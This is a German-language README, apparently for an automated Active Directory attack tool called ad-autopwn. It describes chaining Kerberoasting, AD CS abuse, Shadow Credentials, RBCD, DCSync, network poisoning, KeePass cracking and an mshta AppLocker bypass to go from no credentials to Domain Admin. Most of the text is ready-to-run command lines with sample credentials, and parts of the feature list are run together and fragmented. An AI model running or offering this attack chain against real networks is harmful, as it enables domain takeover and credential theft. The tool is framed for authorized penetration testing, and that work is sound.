
Automatisierte Active-Directory-Angriffskette von Zero-Auth bis Domain Admin. Verkettet 25+ Techniken, darunter Kerberoast, AD CS ESC1-16, Shadow Credentials, RBCD, DCSync und Synacktiv-2026-Reflection-Exploits. Nur für autorisierte Penetrationstests.
Null-Authentifizierung zu Domain-Administrator — Automatisierte Active-Directory-Angriffskette
Ein vollautomatisiertes Penetrationstest-Tool, das 25+ Angriffstechniken zu einer Kette verknüpft, um Active-Directory-Umgebungen zu kompromittieren. Entwickelt für autorisierte Sicherheitsüberprüfungen.
_ ___ _ _ ___
/_\ | \ /_\ _ _| |_ ___| _ \__ __ ___ _
/ _ \| |) | / _ \ || | _/ _ \ _/\ V V / ' \
/_/ \_\___/ /_/ \_\_,_|\__\___/_| \_/\_/|_||_|
⚡ Null-Auth zu Domain-Admin — Angriffskette
Entdecken | Sniffen | ARP | WPAD | WSUS | PXE | AD CS | SCCM | Roasten
BloodHound | Reflektieren | Ausbeuten | RBCD+KCD | DCSync | DPAPI
DONT_REQ_PREAUTH)--spray-password).library-ms / .theme / .url-Dateien auf beschreibbaren Freigabenbloodhound-python -c All-Sammlung + ZIP-AnalyseWriteSPN, AddKeyCredentialLink, GenericAll/Write, WriteDacl/Owner, WriteAccountRestrictions, AddAllowedToAct, ForceChangePasswordWriteSPN → ghost-SPN-Upgrade (CVE-2025-58726)AddKeyCredentialLink → Schatten-Anmeldeinformationen → PKINIT → NT-HashGenericAll / WriteAccountRestrictions on Computer → RBCD-Kette → Admin-TGS-altservice-Umschreibung, in einer Phase-altservice$-Suffix-Wiederholungsversuch bei Principal-Suche → TGT für Linux-Benutzer via automatisch erstelltes <user>$-Maschinenkonto → GSSAPI SSHGet-CimInstance Win32_Process via nxc -x; Regex-Grep nach Passwörtern in mysql/sqlcmd/runas/KeePass/--password-artigen Flags*.kdbx in C:\Users finden, via smbclient herunterladen, keepass2john | hashcat -m 13400# Vollautomatisiert — Null-Anmeldeinformationskette (automatische Erkennung)
sudo ./ad-autopwn.py
# Mit Anmeldeinformationen — vollständige Kette
./ad-autopwn.py -u jsmith -p 'P@ss123' -d corp.local --dc-ip 10.0.0.1
# AWS / VPC-Labs (Layer-2-Angriffe blockiert) — Auto-Erkennung funktioniert trotzdem
sudo ./ad-autopwn.py --no-arp --no-wpad
# Prä-Auth-Anmeldeinformationserkennung (Lockout-sicher)
sudo ./ad-autopwn.py --phase discover --no-arp --no-wpad
# BloodHound-Graph-Sammlung + automatische Hochwert-Analyse
./ad-autopwn.py --phase bloodhound -u user -p pass -d corp.local \
--dc-ip 10.0.0.1 --dc-fqdn dc01.corp.local
# Dollar Ticket — TGT für 'root' via automatisch erstelltes root$-Maschinenkonto
./ad-autopwn.py -u user -p pass -d corp.local --dc-ip 10.0.0.1 \
--phase dollar-ticket --target-user root
# RBCD+KCD-Kette — vollständig ghost-SPN + RBCD + altservice-Umschreibung, auf einen Schlag
./ad-autopwn.py -u user -p pass -d corp.local --dc-ip 10.0.0.1 \
--phase rbcd-kcd -T VHAGAR$ --alt-spn HTTP/vhagar.corp.local
# AppLocker-Bypass
./ad-autopwn.py -u user -p pass --applocker --lolbin mshta --custom-cmd "whoami"
# Probelauf (jeden Befehl anzeigen, nichts ausführen — auch Hintergrundprozesse)
./ad-autopwn.py --dry-run -u user -p pass -d corp.local --dc-ip 10.0.0.1